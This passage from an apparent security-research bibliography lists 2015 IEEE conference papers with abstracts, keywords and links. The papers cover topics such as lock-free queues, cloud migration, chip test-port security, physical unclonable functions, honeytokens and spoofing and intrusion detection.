Keywords: data structures; energy consumption; parallel processing; power aware computing; queueing theory; Mandelbrot application; computer components; data structure implementation; dynamic parts; energy behavior; energy consumption modeling; lock-free concurrent queue data structures; lock-free queue implementations; lock-free queue throughput behavior; parallel applications; power dissipation; steady state behavior; synthetic benchmark data; Benchmark testing; Computational modeling; Data models; Data structures; Instruction sets; Power dissipation; Throughput; analysis; concurrent data structures; energy; lock-free; modeling; power; queue; throughput (ID#: 16-9486)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7161512&isnumber=7161257

 

S. Kolb, J. Lenhard and G. Wirtz, "Application Migration Effort in the Cloud - The Case of Cloud Platforms," Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, New York City, NY, 2015, pp. 41-48. doi: 10.1109/CLOUD.2015.16

Abstract: Over the last years, the utilization of cloud resources has been steadily rising and an increasing number of enterprises are moving applications to the cloud. A leading trend is the adoption of Platform as a Service to support rapid application deployment. By providing a managed environment, cloud platforms take away a lot of complex configuration effort required to build scalable applications. However, application migrations to and between clouds cost development effort and open up new risks of vendor lock-in. This is problematic because frequent migrations may be necessary in the dynamic and fast changing cloud market. So far, the effort of application migration in PaaS environments and typical issues experienced in this task are hardly understood. To improve this situation, we present a cloud-to-cloud migration of a real-world application to seven representative cloud platforms. In this case study, we analyze the feasibility of the migrations in terms of portability and the effort of the migrations. We present a Docker-based deployment system that provides the ability of isolated and reproducible measurements of deployments to platform vendors, thus enabling the comparison of platforms for a particular application. Using this system, the study identifies key problems during migrations and quantifies these differences by distinctive metrics.

Keywords: cloud computing; software cost estimation; software metrics; Docker-based deployment system; PaaS; Platform as a Service; application migration; cloud cost development effort; cloud market; cloud resource utilisation; cloud-to-cloud migration; complex configuration; distinctive metrics; portability; rapid application deployment; scalable applications; Automation; Containers; Measurement; Pricing; Rails; Case Study; Cloud Computing; Metrics; Migration; Platform as a Service; Portability (ID#: 16-9487)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214026&isnumber=7212169

 

A. Del Giudice, G. Graditi, A. Pietrosanto and V. Paciello, "Power Quality in Smart Distribution Grids," Measurements & Networking (M&N), 2015 IEEE International Workshop on, Coimbra, 2015, pp. 1-6. doi: 10.1109/IWMN.2015.7322967

Abstract: Demand Side Management requires both an adequate architecture to observe and control the status of the power grid and precise and real time measurements on which rely. In case of frequency fluctuations, precision is no more guaranteed so without adding more hardware the authors exploit FFT interpolation to estimate the real frequency of electrical signals. After the discovery phase follows the measurement phase in which a low cost Smart Meter computes the metrics specified in the following chapters. Finally, a comparison among measures taken by a reference instrument and the proposed meter is reported.

Keywords: distribution networks; fast Fourier transforms; interpolation; power supply quality; power system measurement; smart meters; FFT interpolation; electrical signal frequency; frequency fluctuations; power grid; power quality; smart distribution grids; smart meter; Current measurement; Frequency estimation; Harmonic analysis; Phasor measurement units; Power measurement; Voltage measurement; Demand Side Management; FFT; Frequency lock; Power Quality; Smart Grid; Smart Metering (ID#: 16-9488)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322967&isnumber=7322959

 

J. Dworak and A. Crouch, "A Call to Action: Securing IEEE 1687 and the Need for an IEEE Test Security Standard," VLSI Test Symposium (VTS), 2015 IEEE 33rd, Napa, CA, 2015, pp. 1-4. doi: 10.1109/VTS.2015.7116256

Abstract: Today's chips often contain a wealth of embedded instruments, including sensors, hardware monitors, built-in self-test (BIST) engines, etc. They may process sensitive data that requires encryption or obfuscation and may contain encryption keys and ChipIDs. Unfortunately, unauthorized access to internal registers or instruments through test and debug circuitry can turn design for testability (DFT) logic into a backdoor for data theft, reverse engineering, counterfeiting, and denial-of-service attacks. A compromised chip also poses a security threat to any board or system that includes that chip, and boards have their own security issues. We will provide an overview of some chip and board security concerns as they relate to DFT hardware and will briefly review several ways in which the new IEEE 1687 standard can be made more secure. We will then discuss the need for an IEEE Security Standard that can provide solutions and metrics for providing appropriate security matched to the needs of a real world environment.

Keywords: built-in self test; cryptography; design for testability; reverse engineering; BIST; ChipID; DFT hardware; DFT logic; IEEE 1687;IEEE test security standard; built-in self-test; data theft; denial-of-service attacks; design for testability; embedded instruments; encryption keys; hardware monitors; internal registers; reverse engineering; Encryption; Instruments; Microprogramming; Ports (Computers);Registers; Standards; BIST; DFT; IEEE Standard; IJTAG; JTAG; LSIB; P1687; lock; scan; security; trap (ID#: 16-9489)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116256&isnumber=7116233

 

Lei Yuan, Hong Chen, Bingtao Ren and Haiyan Zhao, "Model Predictive Slip Control for Electric Vehicle with Four In-Wheel Motors," Control Conference (CCC), 2015 34th Chinese, Hangzhou, 2015, pp. 7895-7900. doi: 10.1109/ChiCC.2015.7260894

Abstract: In order to solve the problem that the electric vehicle wheels may lock up when braking or spin out when accelerating on low-friction coefficient [low-μ] roads, this paper presented a nonlinear model predictive controller for slip control of electric vehicle equipped with four in-wheel motors. The advantage of the proposed nonlinear model predictive control based (NMPC) slip controller is that it can act not only as an anti-lock braking system (ABS) by preventing the tires from locking up when braking, but also as a traction control system (TCS) by preventing the tires from spinning out when accelerating. Besides, the proposed slip controller is also capable of assisting the hydraulic brake system of the vehicle by automatically distributing the braking torque between the wheels using the available braking torque of the in-wheel motors. In this regard, the proposed NMPC slip controller guarantees the optimal traction or braking torque on each wheel on low-μ road condition by individually controlling the slip ratio of each tire within the stable zone with a much faster response time, while considering actuator limitations and wheel slip constraints and performance metrics. The performance of the proposed controller is confirmed by running the electric vehicle model with four individually driven in-wheel motors built in AMESim, through several test maneuvers in the co-simulation environment of AMESim and Simulink.

Keywords: braking; electric vehicles; nonlinear control systems; optimal control; predictive control; torque control; traction; ABS; AMESim; NMPC slip controller; TCS; actuator limitations; anti-lock braking system; braking torque; electric vehicle wheels; hydraulic brake system; in-wheel motors; low-friction coefficient roads; nonlinear model predictive control based slip controller; optimal traction; slip ratio; traction control system; wheel slip constraints; Acceleration; Roads; Tires; Torque; Traction motors; Vehicles; Wheels; Electric vehicle; NMPC; co-simulation; constraint; in-wheel motor; slip control (ID#: 16-9490)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7260894&isnumber=7259602

 

A. Ashraf, K. O. Davis, K. Ogutman, W. V. Schoenfeld and M. D. Eisaman, "Hyperspectral Laser Beam Induced Current System for Solar Cell Characterization," Photovoltaic Specialist Conference (PVSC), 2015 IEEE 42nd, New Orleans, LA, 2015, pp. 1-4. doi: 10.1109/PVSC.2015.7356129

Abstract: We introduce a novel hyperspectral laser beam induced current (LBIC) system that uses a supercontinuum laser that can be tuned from 400nm - 1200nm with diffracted limited spot size. The solar cell is light biased while simultaneously being illuminated by a chopped laser beam at a given wavelength. Current-voltage measurements performed by measuring the current perturbation due to the laser using a lock-in amplifier allow us to extract performance metrics at a specific lateral position and depth (by tuning the wavelength of the laser) while the device is at operating conditions. These parameters are simultaneously compared to material deformations as determined from the doping density, and the built-in voltage. Concurrently we also probe lateral recombination variation by measuring the activation energy thereby providing a comprehensive and unique analysis.

Keywords: OBIC; solar cells; supercontinuum generation; activation energy; chopped laser beam; diffracted limited spot size; doping density; hyperspectral laser beam induced current system; lateral recombination variation; lock-in amplifier; solar cell characterization; supercontinuum laser; Current measurement; Laser beams; Measurement by laser beam; Photovoltaic cells; Resistance; Temperature measurement; Wavelength measurement; hyperspectral; lbic; photovoltaic (ID#: 16-9491)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356129&isnumber=7355590


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Microelectronics Security 2015

 

 
SoS Logo

Microelectronics Security 2015

 

Microelectronics is at the center of the IT world.  Their security—provenance, integrity of their manufacture, and capacity for providing embedded security—is both an opportunity and a problem for cybersecurity research.  For the Science of Security community, microelectronic security is a constituent component of resiliency, composability, and predictive metrics.  The work cited here was presented in 2015.


Solic, K.; Velki, T.; Galba, T., "Empirical Study on ICT System's Users' Risky Behavior and Security Awareness," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1356-1359, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160485

Abstract: In this study authors gathered information on ICT users from different areas in Croatia with different knowledge, experience, working place, age and gender background in order to examine today's situation in the Republic of Croatia (n=701) regarding ICT users' potentially risky behavior and security awareness. To gather all desired data validated Users' Information Security Awareness Questionnaire (UISAQ) was used. Analysis outcome represent results of ICT users in Croatia regarding 6 subareas (mean of items): Usual risky behavior (x1=4.52), Personal computer maintenance (x2=3.18), Borrowing access data (x3=4.74), Criticism on security in communications (x4=3.48), Fear of losing data (x5=2.06), Rating importance of backup (x6=4.18). In this work comparison between users regarding demographic variables (age, gender, professional qualification, occupation, managing job position and institution category) is given. Maybe the most interesting information is percentage of questioned users that have revealed their password for professional e-mail system (28.8%). This information should alert security experts and security managers in enterprises, government institutions and also schools and faculties. Results of this study should be used to develop solutions and induce actions aiming to increase awareness among Internet users on information security and privacy issues.

Keywords: Internet; data privacy; electronic mail; risk analysis; security of data; ICT system; Internet users; Republic of Croatia; UISAQ; age; enterprises; experience; gender background; government institutions; institution category; job position; knowledge; occupation; personal computer maintenance; privacy issues; professional e-mail system; professional qualification; security awareness; security experts; security managers; user information security awareness questionnaire; user risky behavior; working place; Electronic mail; Government; Information security; Microcomputers; Phase change materials; Qualifications (ID#: 16-9325)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160485&isnumber=7160221

 

Sparrow, R.D.; Adekunle, A.A.; Berry, R.J.; Farnish, R.J., "Study of Two Security Constructs on Throughput for Wireless Sensor Multi-Hop Networks," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1302-1307, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160476

Abstract: With the interconnection of devices becoming more widespread in society (e.g. internet of things), networked devices are used in a range of environments from smart grids to smart buildings. Wireless Sensor Networks (WSN) have commonly been utilised as a method of monitoring a set processes. In control networks WSN have been deployed to perform a variety of tasks (i.e. collate and distribute data from an event to an end device). However, the nature of the wireless broadcast medium enables attackers to conduct active and passive attacks. Cryptography is selected as a countermeasure to overcome these security vulnerabilities; however, a drawback of using cryptography is reduced throughput. This paper investigates the impact of two software authenticated encryption with associated data (AEAD) security constructs on packet throughput of multiple hop WSN, being counter with cipher block chaining and message authentication code (CCM) and TinyAEAD. Experiments were conducted in a simulated environment. A case scenario is also presented in this paper to emphasize the impact in a real world context. Results observed indicate that the security constructs examined in this paper affect the average throughput measurements up to three hops.

Keywords: Internet of Things; cryptography; telecommunication security; wireless sensor networks; AEAD security ;Internet of Things; WSN; cipher block chaining; control networks WSN; cryptography; device interconnection; end device; message authentication code; networked devices; passive attacks; security construction; security vulnerabilities; simulated environment; software authenticated encryption with associated data; wireless broadcast medium; wireless sensor multihop networks; Communication system security; Mathematical model; Security; Simulation; Throughput; Wireless communication; Wireless sensor networks; AEAD constructs; Networked Control Systems; Wireless Sensor Networks (ID#: 16-9326)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160476&isnumber=7160221

 

Ivantsiv, R.-A.; Khanas, Y., "Methods Of Information Security Based Cryptographic Transformations Matrix Noise Immunity," in Experience of Designing and Application of CAD Systems in Microelectronics (CADSM), 2015 13th International Conference The, pp. 218-220, 24-27 Feb. 2015. doi: 10.1109/CADSM.2015.7230840

Abstract: Paper describes the main methods for ensuring the integrity of information systems, software implementation of these methods will create a security system for information structures. The focus is on algorithms transformation matrix algebra and investigation of modifications and improvements.

Keywords: cryptography; matrix algebra; information security based cryptographic transformation matrix noise immunity methods; information structures; information system integrity; security system; software implementation; transformation matrix algebra; Cryptography; Distortion; Encoding; Information security; Mathematical model; Matrices; Resistance (ID#: 16-9327)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7230840&isnumber=7230772

 

Ristov, S.; Gusev, M., "Operating System Impact on CPU and RAM Utilisation When Introducing XML Security," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 254-258, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160275

Abstract: Introducing XML security to a web service increases the message size, which impacts the XML parsing of the greater message and complicates its processing due to complex cryptographic operations. Both tasks impact the web server's CPU and RAM utilisation. The performance impact is even more expressed when the number of concurrent messages is rapidly increased. In this paper we analyze the impact of securing a web service message with XML Signature and XML Encryption over the hardware performance, varying the message size and the number of concurrent messages. The results show that web server that is installed on Linux utilizes the CPU less than the same web server that is installed on Windows. The situation for RAM memory is opposite, that is, the web server installed on Windows operating system occupies less RAM memory.

Keywords: Web services; cryptography; digital signatures; operating systems (computers); random-access storage; CPU utilization; Linux; RAM memory; RAM utilization; Web service; Windows; XML encryption; XML parsing; XML security; XML signature; concurrent messages; cryptographic operations; extensible markup language; operating system; random access memory; Linux; Operating systems; Random access memory; Security; Web servers; XML; CPU; Operating systems; Performance; RAM; Web service (ID#: 16-9328)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160275&isnumber=7160221

 

Hrestak, D.; Picek, S.; Rumenjak, Z., "Improving the Android Smartphone Security Against Various Malware Threats," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1290-1295, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160474

Abstract: Android is one of the most popular operating systems for mobile devices in the world today. One of its greatest advantages, being an open source operating system, represents also one of its major drawbacks. There exists a number of malicious programs that can harm devices running any operating system, including Android. In accordance to that, having a system that is secure presents a goal of a paramount importance. However, the fact that the improvements in the security often come with a penalty in the usability can present a problem. Furthermore, it is difficult to give a good answer to a question when a system is secure enough since that heavily depends on the user's needs. In this paper we investigate several ways on how to improve the security of Android devices through various customizations of the operating system or third-party applications.

Keywords: Android (operating system); invasive software; public domain software; smart phones; Android devices; Android smartphone security; malware threats; mobile devices; open source operating system; Androids; Humanoid robots; Malware; Operating systems; Smart phones (ID#: 16-9329)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160474&isnumber=7160221

 

Oksana, T., "Development System of Protection Electronic Document to Ensure the Integrity and Confidentiality of Information," in Experience of Designing and Application of CAD Systems in Microelectronics (CADSM), 2015 13th International Conference The, pp. 376-378, 24-27 Feb. 2015. doi: 10.1109/CADSM.2015.7230880

Abstract: Developed a mathematical model and a functional scheme for workflow systems with protection information. The system is based on the role security model and provides multiple levels of attributes for documents. The developed system ensures the availability, integrity and confidentiality of information, protecting documents from tampering. For printed documents developed several levels of protection, which allows to increase the effectiveness of the system.

keywords: data privacy; document handling; electronic document protection; information confidentiality; information integrity; mathematical model; role security model; Data models; Databases; Libraries; Mathematical model; Organizations; Security; latent images; protection of document; security printing; system protection of document (ID#: 16-9330)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7230880&isnumber=7230772

 

Petrunic, A.B.R., "Honeytokens as Active Defense," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1313-1317, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160478

Abstract: Web applications are one of the mostly attacked platforms today, and because of that new ways to break into the web applications are being invented almost on a daily basis, allowing attackers to steal user's personal data, credit card numbers, and conduct many other frauds related to data and applications hosted on the Internet servers and databases. Some of the reasons that web applications are constantly attacked is 24/7 availability, mix of technologies used to provide needed functionality, interesting data in the backend databases and easy way to avoid punishment for crimes committed against web sites and website users/owners. There is also an aspect related to cybercrime and cyber warfare that is marching throughout the planet in the last few years, exposing more and more personal data in highly sophisticated and targeted attacks. This paper will try to summarize few different ways that web application could be written in order to identify, isolate and track the hacker during the attack process. The concept presented in this paper is so called honeytoken - a value the application is using in databases, files, parameters, etc, which should never be changed or touched by the application in normal application lifecycle.

Keywords: Internet; Web sites; computer crime; Internet servers; Web applications; Web sites; active defense; attack process; cyber warfare; cybercrime; databases; honeytokens; Computer hacking; Databases; File systems; Firewalls (computing); IP networks; Robots; Web application security; active defense; honeytoken (ID#: 16-9331)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160478&isnumber=7160221

 

Mispan, M.S.; Halak, B.; Chen, Z.; Zwolinski, M., "TCO-PUF: A Subthreshold Physical Unclonable Function," in Ph.D. Research in Microelectronics and Electronics (PRIME), 2015 11th Conference on, pp. 105-108, June 29 2015-July 2 2015. doi: 10.1109/PRIME.2015.7251345

Abstract: A Physical Unclonable Function (PUF) is a promising technology towards comprehensive security protection for integrated circuit applications. It provides a secure method of hardware identification and authentication by exploiting inherent manufacturing process variations to generate a unique response for each device. Subthreshold Current Array PUFs, which are based on the non-linearity of currents and voltages in MOSFETs in the subthreshold region, provide higher security against machine learning-based attacks compared with delay-based PUFs. However, their implementation is not practical due to the low output voltages generated from transistor arrays. In this paper, a novel architecture for a PUF, called the “Two Chooses One” PUF or TCO-PUF, is proposed to improve the output voltage ranges. The proposed PUF shows excellent quality metrics. The average inter-chip Hamming distance is 50.23%. The reliability over the temperature and ±10% supply voltage fluctuations is 91.58%. In terms of security, on average TCO-PUF shows higher security compared to delay-based PUFs and existing designs of Subthreshold Current Array PUFs against machine learning attacks.

Keywords: MOSFET; cryptographic protocols; integrated circuit design; integrated circuit reliability; learning (artificial intelligence);security of data; MOSFET; TCO-PUF; current nonlinearity; hardware authentication; hardware identification; integrated circuit applications; interchip Hamming distance; machine learning-based attacks; security protection; subthreshold current array PUF; two chooses one physical unclonable function; Arrays; Measurement; Reliability; Security; Subthreshold current; Transistors; Modelling attacks; Physical Unclonable Function; Subthreshold (ID#: 16-9332)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7251345&isnumber=7251078

 

Saeed, A.; Ahmadinia, A.; Just, M., "Hardware-Assisted Secure Communication for FPGA-Based Embedded Systems," in Ph.D. Research in Microelectronics and Electronics (PRIME), 2015 11th Conference on, pp. 216-219, June 29 2015-July 2 2015. doi: 10.1109/PRIME.2015.7251373

Abstract: In recent years, embedded systems have evolved rapidly and become ubiquitous as they are found in a large number of devices. At the same time, as a result of recent technological advancements and high demand of connectivity, such systems are particularly susceptible to security attacks. Software-based security solutions cannot provide complete protection and are relatively slow. On the other hand, hardware-assisted techniques improve execution time but still involve dedicated software modules. In this paper, we have proposed a hardware based mechanism to process sensitive information in complete isolation without requiring any software process. The proposed solution is evaluated for an image processing based authentication system and it has demonstrated negligible area, power consumption and performance overhead.

Keywords: embedded systems; field programmable gate arrays; power consumption; security of data; ubiquitous computing; FPGA-based embedded systems; hardware-assisted secure communication; image processing based authentication system; performance overhead; power consumption; security attacks; software-based security solutions; ubiquitous system; Databases; Embedded systems; Hardware; Power demand; Process control; Security (ID#: 16-9333)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7251373&isnumber=7251078

 

Sanchez, I.; Satta, R.; Giuliani, R.; Baldini, G., "Detection of DECT Identity Spoofing Through Radio Frequency Fingerprinting," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1296-1301, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160475

Abstract: Digital Enhanced Cordless Telecommunications (DECT) is an European Telecommunications Standards Institute (ETSI) standard for short-range cordless communications with a large worldwide installed customer base, both in residential and enterprise environments. As in other wireless standards, the existence of active attacks against the security and privacy of the communications, involving identity spoofing, is well documented in the literature. Although the detection of spoofing attacks has been extensively investigated in the literature for other wireless protocols, such as Wi-Fi and GSM, very limited research has been conducted on their detection in DECT communications. In this paper, we describe an effective method for the detection of identity spoofing attacks on DECT communications, using a radio frequency fingerprinting technique. Our approach uses intrinsic features of the front end of DECT base stations as device fingerprints and uses them to distinguish between legitimate and spoofing devices. The results of measurement campaigns and the related analysis are presented and discussed.

Keywords: digital communication; protocols; radio networks; telecommunication security; DECT identity spoofing Detection; ETSI standard; European Telecommunications Standards Institute standard; base station; communication privacy; communication security; digital enhanced cordless telecommunication; radiofrequency fingerprinting; wireless standard; Base stations; GSM; IEEE 802.11 Standards; Radio frequency; Security (ID#: 16-9334)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160475&isnumber=7160221

 

Salunke, A.; Ambawade, D., "Dynamic Sequence Number Thresholding Protocol for Detection of Blackhole Attack in Wireless Sensor Network," In Communication, Information & Computing Technology (ICCICT), 2015 International Conference on, pp. 1-4, 15-17 Jan. 2015. doi: 10.1109/ICCICT.2015.7045745

Abstract: The Wireless Sensor Network (WSN) is a distributed wireless micro-electronic-mechanical system which is deployed in hostile environment, has inherent insecure communication medium and resource constraints. This makes security of Wireless Sensor Network challenging. The blackhole attack is a security threat which manipulates sequence number to degrade the performance of the WSN by increasing packet loss. In this research we present a protocol that detects manipulation of sequence number and thus secures network from blackhole attack by sequence number thresholding. The significance of protocol is unlike other methods this thresholding is dynamic and carried out in real time.

Keywords: protocols; telecommunication security; wireless sensor networks; WSN; blackhole attack detection; distributed wireless microelectronic mechanical system; dynamic sequence number thresholding protocol; hostile environment; medium constraints; packet loss; resource constraints; wireless sensor network; Computers; Packet loss; Routing; Routing protocols; Security; Wireless sensor networks (ID#: 16-9335)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7045745&isnumber=7045627

 

Bol, D.; de Streel, G.; Flandre, D., "Can We Connect Trillions of IoT Sensors in a Sustainable Way? A Technology/Circuit Perspective,” in SOI-3D-Subthreshold Microelectronics Technology Unified Conference (S3S), 2015 IEEE, pp. 1-3, 5-8 Oct. 2015. doi: 10.1109/S3S.2015.7333500

Abstract: The Internet-of-Things is about to revolutionize our world with trillions of sensors to be deployed. However, this revolution raises sustainability issues at the economical, societal and environmental levels: security and privacy of the sensed data, environmental and economical costs of battery production and replacement, carbon footprint associated to the production of the sensor nodes, congestion of the RF spectrum due to numerous connected devices and electrical power consumption of the ICT infrastructure to support the Internet traffic due to the sensed data. In this paper, we show how these high-level challenges can be translated into IC design targets for three main functions of IoT nodes: digital signal processing (DSP), embedded power management (PM) and low-power wireless RF communications. We then demonstrate that CMOS technology scaling and ultra-low-voltage operation can help meeting these targets through an analysis of their benefits on simple yet representative DSP, PM and RF blocks.

Keywords: CMOS integrated circuits; Internet; Internet of Things; digital signal processing chips; electric sensing devices; integrated circuit design; low-power electronics; security of data; CMOS technology scaling; DSP; DSP block; IC design; ICT infrastructure; Internet traffic; Internet-of-Things; IoT nodes; IoT sensors; PM block; RF block; RF spectrum congestion; battery production; battery replacement; carbon footprint; digital signal processing; economical cost; economical level; electrical power consumption; embedded PM; embedded power management; environmental cost; environmental level; low-power wireless RF communication; sensed data privacy; sensed data security; sensor node production; societal level; sustainability issue; ultralow-voltage operation; CMOS integrated circuits; CMOS technology; Digital signal processing; Noise measurement; Radio frequency; Sensors; Wireless communication (ID#: 16-9336)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7333500&isnumber=7333477

 

Vitas, I.; Simunic, D.; Knezevic, P., "Evaluation of Software Defined Radio systems for Smart Home Environments," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 562-565, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160335

Abstract: Software Defined Radio systems are predicted to be radio access networks of next generation in all kind of wireless communications systems. Their use is not limited to radio front end that is first chosen for system operation. They can be upgraded by time as system needs changes or evolves which gives them radio front end flexibility never seen before in radio systems. Smart home environments such as eWALL system and other uses numerous of wireless technologies to control lot of appliances in them or to monitor specific health state of the people living there etc. Therefore, lot of wireless technologies have been developed solely for that purpose, leaders among them are ZigBee and Z-Wave technologies which are today standard for wireless home automation systems that are energy efficient and secure. Software Defined Radio is certainly very useful for future mobile communication systems. In this work Software Defined Radio system will be evaluated with a purpose of introducing local radio networks that are used in smart home environments based of Software Defined Radios. Benefits and shortcomings of using Software Defined Radio in this systems will be shown and evaluated.

Keywords: Zigbee; assisted living; home automation; mobile radio; next generation networks; radio access networks; software radio; Z-wave technology; ZigBee technology; future mobile communication system; next generation radio access network; smart home environment; oftware defined radio system; wireless home automation system; Assisted living; Communication system security; Logic gates; Smart homes; Software radio; Wireless communication; Wireless sensor networks; Software Defined Radio; ambient assisted living; local area networks; smart home environments; smart living; ubiquitous computing (ID#: 16-9337)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160335&isnumber=7160221

 

Milic, L.; Jelenkovic, L., "A Novel Versatile Architecture for Internet of Things," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1026-1031, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160426

Abstract: This paper presents an overview of contemporary architectures for Internet of Things and then introduces a simple novel architecture. The main goal of proposed architecture is to remain simple but still applicable to any Internet of Things environment. Specific applications of IoT should be implemented in application layer, using proposed architecture as backbone. Proposed architecture isn't yet fully defined, but ideas on which is based are well defined and should provide straightforward design and implementation.

Keywords: Internet of Things; personal area networks; Internet of Things architecture; IoT; WPAN; application layer; Computer architecture; Internet; Logic gates; Protocols; Security; Sensors; Unified modeling language (ID#: 16-9338)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160426&isnumber=7160221

 

Savchenko, D.I.; Radchenko, G.I.; Taipale, O., "Microservices Validation: Mjolnirr Platform Case Study," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 235-240, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160271

Abstract: Microservice architecture is a cloud application design pattern that implies that the application is divided into a number of small independent services, each of which is responsible for implementing of a certain feature. The need for continuous integration of developed and/or modified microservices in the existing system requires a comprehensive validation of individual microservices and their co-operation as an ensemble with other microservices. In this paper, we would provide an analysis of existing methods of cloud applications testing and identify features that are specific to the microservice architecture. Based on this analysis, we will try to propose a validation methodology of the microservice systems.

Keywords: cloud computing; software architecture; Mjolnirr platform case study; cloud application design pattern; microservices validation; Computer architecture; IEC standards; ISO standards; Security; Service-oriented architecture; Testing; Cloud computing; Microservices; PaaS; Services Oriented Architecture; testing; validation (ID#: 16-9339)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160271&isnumber=7160221

 

Yafei Wu; Yongxin Zhu; Tian Huang; Xinyang Li; Xinyi Liu; Mengyun Liu, "Distributed Discord Discovery: Spark Based Anomaly Detection in Time Series," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 154-159, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.228

Abstract: The computational complexity of discord discovery is O(m2), where m is the size of time series. Many promising methods were proposed to resolve this compute-intensive problem. These methods sequentially discover discords on standalone machine. The limited capability of standalone machine in terms of computing and memory capacity hinders these methods in discovering discords from large dataset in reasonable time. In this work, we propose a distributed discord discovery method. Our method is able to combine discord results from different computing nodes, which are non-combinable in previous literature. We mitigate the issue of the memory wall by using distributed data partitioning. We implement our method on distributed Spark computing framework and distributed HDFS (Hadoop Distributed File System) storage platform. The implementation exhibits superior scalability and enables discords discovery in multi-dimension time series. We evaluate our method with terabyte-sized dataset, which is larger than any dataset in previous literature. Evaluation results show that our method has clear advantage in terms of performance and efficiency over state-of-the-art algorithms.

Keywords: computational complexity; distributed processing; parallel processing; security of data; time series; O(m2); anomaly detection; computational complexity; distributed Hadoop distributed file system storage platform; distributed data partitioning; distributed discord discovery method; distributed spark computing framework; distributed storage platform; memory capacity hinder; multidimension time series; Acceleration; Algorithm design and analysis; Clustering algorithms; Force; microelectronics; Sparks; Time series analysis; Spark; anomaly; discord; time series (ID#: 16-9340)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336158&isnumber=7336120

 

Stampar, M.; Fertalj, K., "Artificial Intelligence in Network Intrusion Detection," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 1318-1323, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160479

Abstract: In past, detection of network attacks has been almost solely done by human operators. They anticipated network anomalies in front of consoles, where based on their expert knowledge applied necessary security measures. With the exponential growth of network bandwidth, this task slowly demanded substantial improvements in both speed and accuracy. One proposed way how to achieve this is the usage of artificial intelligence (AI), progressive and promising computer science branch, particularly one of its sub-fields - machine learning (ML) - where main idea is learning from data. In this paper authors will try to give a general overview of AI algorithms, with main focus on their usage for network intrusion detection.

Keywords: computer network security; learning (artificial intelligence); AI algorithm; ML; artificial intelligence; expert knowledge; machine learning; network attacks detection; network bandwidth; network intrusion detection; Artificial intelligence; Artificial neural networks; Classification algorithms; Intrusion detection; Market research; Niobium; Support vector machines (ID#: 16-9341)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160479&isnumber=7160221

 

Hodanic, D.; Vrkic, N.; Tomic, M., "Data Storage and Synchronization in Private Cloud," in Information and Communication Technology, Electronics and Microelectronics (MIPRO), 2015 38th International Convention on, pp. 476-480, 25-29 May 2015. doi: 10.1109/MIPRO.2015.7160318

